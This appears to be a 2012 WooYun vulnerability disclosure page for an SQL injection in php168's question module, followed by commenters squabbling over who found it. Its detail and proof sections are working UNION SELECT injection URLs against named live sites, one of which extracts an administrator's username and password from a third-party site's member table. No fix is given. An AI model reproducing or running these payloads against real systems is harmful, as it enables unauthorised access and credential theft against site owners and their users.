当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013476

漏洞标题:php168某系统注入漏洞

相关厂商:php168

漏洞作者: 书生

提交时间:2012-10-17 22:33

修复时间:2012-10-17 22:33

公开时间:2012-10-17 22:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-10-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

貌似有人在批量了,所以就发出来了

详细说明:

http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--


http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--


漏洞证明:

http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--


http://www.china-highway.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--

修复方案:

元芳你怎么看?

版权声明:转载请注明来源 书生@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2012-10-17 22:35 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    元NMLGB。

  2. 2012-10-18 10:43 | 撸管骚年 ( 路人 | Rank:12 漏洞数:4 | 可以不填吗?)

    大人此事必有蹊跷!

  3. 2012-10-20 20:23 | cooL ( 路人 | Rank:14 漏洞数:5 | hello word)

    表示恶心。。。你发表的时候也注明下版权吧。。。

  4. 2012-10-23 00:06 | 书生 ( 路人 | Rank:9 漏洞数:4 )

    @cooL 怎么说?实实在在全网首发,什么版权?

  5. 2012-10-24 22:30 | cooL ( 路人 | Rank:14 漏洞数:5 | hello word)

    @书生 嗯 呵呵全网首发不假.....但是你是哪来的这个漏洞呢? 不会是无意间发现的吧...0.0

  6. 2012-10-25 18:17 | 书生 ( 路人 | Rank:9 漏洞数:4 )

    @cooL 有人说出0day了,然后黑盒扫出来的,不会是你告诉我的我忘记了吧?

  7. 2012-10-26 11:20 | cooL ( 路人 | Rank:14 漏洞数:5 | hello word)

    @书生 呵呵 我和朋友fortune 研究出来的主要是他的功劳 0.0。 他在你的群里发了一下, 你就把公布网上了,说是无意间发现的,他很生气 0.0

  8. 2012-10-31 10:08 | 书生 ( 路人 | Rank:9 漏洞数:4 )

    @cooL 你是说那个ME?他确实很牛逼,整天在群里批量拿站还截图,只看见他很牛逼的说他手握php168跟phpwind的零日漏洞

  9. 2012-11-01 15:08 | cooL ( 路人 | Rank:14 漏洞数:5 | hello word)

    @书生 额 不会吧 0.0